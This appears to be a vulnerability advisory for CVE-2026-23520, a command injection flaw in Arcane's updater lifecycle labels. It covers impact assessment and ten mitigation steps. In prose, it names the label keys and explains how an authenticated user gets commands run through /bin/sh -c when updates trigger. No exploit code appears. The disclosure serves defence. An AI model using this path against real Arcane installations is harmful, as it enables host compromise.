CVE-2026-23520 is an OS command injection vulnerability classified under CWE-78 affecting Arcane, a Docker management tool, in versions prior to 1.13.0. The vulnerability arises from Arcane's updater service supporting lifecycle labels (com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update) that allow execution of shell commands before or after container updates. These label values are passed directly to /bin/sh -c without any sanitization or validation, enabling command injection. Any authenticated user, not limited to administrators, can create projects via the API and specify these lifecycle labels with malicious commands. When an administrator triggers a container update, either manually or through scheduled checks, Arcane executes the malicious command inside the container context. This can lead to arbitrary code execution with the privileges of the updater service, potentially compromising the host system and container environments. The vulnerability has a CVSS v3.1 score of 9.1 (critical), reflecting its high impact on confidentiality, integrity, and availability, ease of exploitation with low attack complexity, and the requirement for low privileges but some user interaction (admin-triggered update). No known exploits are reported in the wild yet. The issue is resolved in Arcane version 1.13.0 by properly sanitizing or removing the unsafe command execution mechanism.

For European organizations, this vulnerability poses a significant risk especially to those relying on Arcane for Docker container management. Successful exploitation can lead to full system compromise, data breaches, and disruption of containerized services, impacting business continuity and data confidentiality. Since any authenticated user can inject commands, insider threats or compromised user accounts could be leveraged to escalate privileges and execute arbitrary commands. This could result in unauthorized access to sensitive data, deployment of malware or ransomware, and disruption of critical infrastructure. Organizations in sectors with high container adoption such as finance, telecommunications, and critical infrastructure are particularly vulnerable. The vulnerability also increases the attack surface in multi-tenant environments where project creation is accessible to multiple users. The requirement for administrator interaction to trigger updates means that operational procedures and update policies could influence risk exposure.

1. Upgrade Arcane to version 1.13.0 or later immediately to apply the official fix. 2. Restrict project creation permissions to trusted users only, minimizing the risk of malicious lifecycle label injection. 3. Implement strict access controls and monitoring on the Arcane API to detect unauthorized project creations or suspicious lifecycle label usage. 4. Audit and review lifecycle label configurations regularly to ensure no unauthorized commands are present. 5. Limit the privileges of the updater service and container update processes to the minimum necessary to reduce impact if exploited. 6. Establish operational procedures requiring verification before triggering container updates, especially in production environments. 7. Employ runtime security tools to monitor container and host behavior for anomalous command executions. 8. Educate administrators about the risk and signs of exploitation related to lifecycle label abuse. 9. Consider network segmentation to isolate container management services from general user networks. 10. Maintain up-to-date backups and incident response plans to mitigate potential damage from exploitation.